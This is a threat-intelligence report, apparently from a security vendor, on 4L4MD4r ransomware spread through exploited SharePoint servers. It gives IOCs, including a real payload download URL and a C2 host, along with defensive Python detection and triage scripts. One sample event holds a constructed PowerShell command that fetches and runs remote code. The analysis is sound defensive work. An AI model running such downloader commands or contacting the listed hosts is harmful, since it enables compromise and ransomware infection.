
Background

In July 2025, Microsoft SharePoint Server was hit by a set of serious remote code execution (RCE) vulnerabilities (CVE-2025-49704, CVE-2025-49706, CVE-2025-53770 and CVE-2025-53771). They have been widely exploited by threat groups and affect tens of thousands of servers worldwide. The RedDrip Team of Qi'anxin Threat Intelligence Center analyzed the vulnerabilities immediately and monitored for exploitation on the endpoint side. On July 27 we observed that an Internet-facing SharePoint server of a healthcare customer was compromised and a malicious PowerShell command was executed; TianQing intercepted it, and follow-up analysis uncovered the 4L4MD4r ransomware, written in Go, whose function names carry strong religious connotations. According to a report from a peer vendor [1], this tool appears to belong to the Mimo group, a financially motivated Turkish threat actor.

We recommend that government and enterprise customers deploy TianQing in both office and server zones; with TianQing's "Liuhe" advanced threat defense engine enabled, exploitation of this vulnerability is intercepted.


Sample analysis

The process chain we observed is as follows:

Grandparent process: c:\windows\system32\inetsrv\w3wp.exe -ap "SharePoint - 80" -v "v4.0" ****
Parent process: C:\Windows\System32\cmd.exe
Target process: powershell.exe -exec bypass -enc <base64-encoded command omitted>

The decoded command is a simple downloader: it fetches the payload from a compromised Italian website used as a springboard and executes it. The execution was intercepted by TianQing.

Springboard URL: https://ice.theinnovationfactory.it/static/4l4md4r.exe
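As an added example (not code from the original report, and not code from the ransomware or its operators), the following Python script reconstructs the detection logic implied by the process chain above: it walks Sysmon-style process-creation events, flags any powershell.exe whose ancestry includes the SharePoint IIS worker process w3wp.exe, and decodes the -enc argument (base64 of a UTF-16LE string) so the downloader can be read. The events, the field names and the encoded command (pointing at the placeholder host example.invalid) are constructed for the example and are assumptions, not the real payload.

```python
import base64
import re

# Constructed PowerShell downloader standing in for the elided -enc payload (assumption:
# the real command differs in URL and details). -EncodedCommand takes base64 of UTF-16LE text.
ENCODED_DOWNLOADER = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x.ps1')"
    .encode("utf-16le")
).decode("ascii")

# Constructed Sysmon-style process-creation events (not telemetry from the incident).
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 612,
     "image": "c:\\windows\\system32\\inetsrv\\w3wp.exe",
     "cmdline": 'c:\\windows\\system32\\inetsrv\\w3wp.exe -ap "SharePoint - 80" -v "v4.0"'},
    {"pid": 5308, "ppid": 4120,
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "C:\\Windows\\System32\\cmd.exe /c powershell.exe -exec bypass -enc " + ENCODED_DOWNLOADER},
    {"pid": 5320, "ppid": 5308,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -exec bypass -enc " + ENCODED_DOWNLOADER},
    # Benign noise: an admin PowerShell that is not descended from the IIS worker process.
    {"pid": 7000, "ppid": 900,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

# Common spellings of the -EncodedCommand switch followed by its base64 argument.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def process_chain(event, by_pid):
    """Follow parent links as far as the visible events allow; returns [root, ..., event]."""
    chain = [event]
    seen = {event["pid"]}
    cur = event
    while cur["ppid"] in by_pid and cur["ppid"] not in seen:
        cur = by_pid[cur["ppid"]]
        seen.add(cur["pid"])
        chain.append(cur)
    chain.reverse()
    return chain


def find_sharepoint_webshell_chains(events):
    """Flag powershell.exe whose ancestry contains the SharePoint app-pool worker w3wp.exe."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if not e["image"].lower().endswith("\\powershell.exe"):
            continue
        chain = process_chain(e, by_pid)
        spawned_by_sharepoint = any(
            a["image"].lower().endswith("\\inetsrv\\w3wp.exe") and "sharepoint" in a["cmdline"].lower()
            for a in chain
        )
        if spawned_by_sharepoint:
            hits.append({
                "chain": " -> ".join(a["image"].rsplit("\\", 1)[-1] for a in chain),
                "decoded": decode_encoded_command(e["cmdline"]),
            })
    return hits


if __name__ == "__main__":
    for hit in find_sharepoint_webshell_chains(SAMPLE_EVENTS):
        print(hit["chain"])
        print("  decoded:", hit["decoded"])
```

The ancestry walk matters more than the -enc flag itself: an IIS worker process for a SharePoint application pool has no business spawning cmd.exe or PowerShell, so the chain is a strong signal even when the command line is not encoded.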

From VirusTotal (VT) data we obtained 4l4md4r.exe.

It is a new ransomware family written in Go, with function names that carry strong religious connotations:

(The names use language associated with Shia Islam.)

The 4L4MD4r ransomware appears to be the Mimo group's first ransomware delivery. The sample first decrypts the final payload in memory.

It then allocates memory and maps the decrypted PE file into it.

Finally, it creates a new thread to execute the loaded PE.

The decrypted and loaded PE file is the 4l4md4r ransomware itself. It first performs a timing check as an anti-debugging measure and exits if the check times out.

It then obtains the computer name and generates an ID and an enckey (the key used to encrypt files), merging them into one JSON object.

The JSON content is encrypted and uploaded to http://bpp.theinnovationfactory.it:445.

If the upload fails more than three times, the sample also exits.

If the upload succeeds, encryption begins. Files are encrypted with enckey, and each encrypted file is renamed to the base64 encoding of its original file name.

After file encryption completes, a ransom note DECRYPTION_INSTRUCTIONS.html and a list of encrypted files NCRYPTED_LIST.html are written to the desktop.

The ransom note reads as follows:

Contact Email: m4_cruise@proton.me

Encrypted suffix: .4l4md4r
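As an added example for incident response (not code from the original report or from the ransomware), the following Python script inverts the renaming described above: it scans a file listing, separates the ransom notes, files carrying the .4l4md4r suffix and untouched files, and maps each encrypted name back to the original by base64-decoding the stem, so an inventory of affected files can be produced without trusting the attacker's NCRYPTED_LIST.html. The listing is constructed; the base64 alphabet and padding behaviour of the real sample are assumptions, so both standard and URL-safe decoding are attempted and undecodable names are reported rather than guessed.

```python
import base64
import ntpath

RANSOM_SUFFIX = ".4l4md4r"
RANSOM_NOTES = {"DECRYPTION_INSTRUCTIONS.html", "NCRYPTED_LIST.html"}


def _encrypted_name(original):
    # Used only to build the constructed sample below; assumes standard base64 with padding.
    return base64.b64encode(original.encode("utf-8")).decode("ascii") + RANSOM_SUFFIX


# Constructed directory listing of a victim host (not data from the incident).
SAMPLE_LISTING = [
    "C:\\Users\\admin\\Desktop\\DECRYPTION_INSTRUCTIONS.html",
    "C:\\Users\\admin\\Desktop\\NCRYPTED_LIST.html",
    "D:\\Shares\\Finance\\" + _encrypted_name("Q3_budget.xlsx"),
    "D:\\Shares\\Finance\\" + _encrypted_name("contracts 2025.docx"),
    "D:\\Shares\\Finance\\readme.txt",              # not encrypted
    "D:\\Shares\\Finance\\!!notbase64!!.4l4md4r",   # suffix present but stem is not base64
]


def recover_original_name(encrypted_name):
    """Map '<base64(original)>.4l4md4r' back to the original file name.

    The report only says the new name is the base64 form of the old one. Which alphabet
    is used and whether padding is kept is an assumption, so standard and URL-safe
    base64 are both tried after repairing padding. Returns None if neither decodes."""
    if not encrypted_name.endswith(RANSOM_SUFFIX):
        return None
    stem = encrypted_name[:-len(RANSOM_SUFFIX)]
    padded = stem + "=" * (-len(stem) % 4)
    for altchars in (None, b"-_"):
        try:
            raw = base64.b64decode(padded, altchars=altchars, validate=True)
            name = raw.decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if name and "\\" not in name and "/" not in name:
            return name
    return None


def triage_listing(paths):
    """Classify a listing into ransom notes, recovered (encrypted -> original), undecodable, untouched."""
    result = {"ransom_notes": [], "recovered": [], "undecodable": [], "untouched": []}
    for p in paths:
        name = ntpath.basename(p)
        if name in RANSOM_NOTES:
            result["ransom_notes"].append(p)
        elif name.endswith(RANSOM_SUFFIX):
            original = recover_original_name(name)
            if original is None:
                result["undecodable"].append(p)
            else:
                result["recovered"].append((p, ntpath.join(ntpath.dirname(p), original)))
        else:
            result["untouched"].append(p)
    return result


if __name__ == "__main__":
    report = triage_listing(SAMPLE_LISTING)
    for key, items in report.items():
        print(f"{key}: {len(items)}")
        for item in items:
            print("   ", item)
```

Because the rename is a plain encoding rather than a hash, the original names (and therefore the scope of the incident) can be reconstructed from the file system alone; the file contents, encrypted with enckey, cannot.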

The public key used to encrypt the JSON is as follows:

We queried the BTC wallet address given in the ransom note: it shows no incoming transfer matching the 0.005 BTC ransom amount, which suggests that no victim has paid the 4l4md4r ransom so far.


Summary

At present, Qi'anxin's full product line built on Threat Intelligence Center data, including the Qi'anxin Threat Intelligence Platform (TIP), TianQing, the Tianyan Advanced Threat Detection System, Qi'anxin NGSOC and Qi'anxin Situational Awareness, already supports accurate detection of this attack.


IOC

MD5:

90f71cb5df71ae3845ff81edd776b287

C2:

hxxps://ice.theinnovationfactory.it/static/4l4md4r.exe

bpp.theinnovationfactory.it:445


Reference Links

[1] https://blog.sekoia.io/the-sharp-taste-of-mimolette-analyzing-mimos-latest-campaign-targeting-craft-cms/
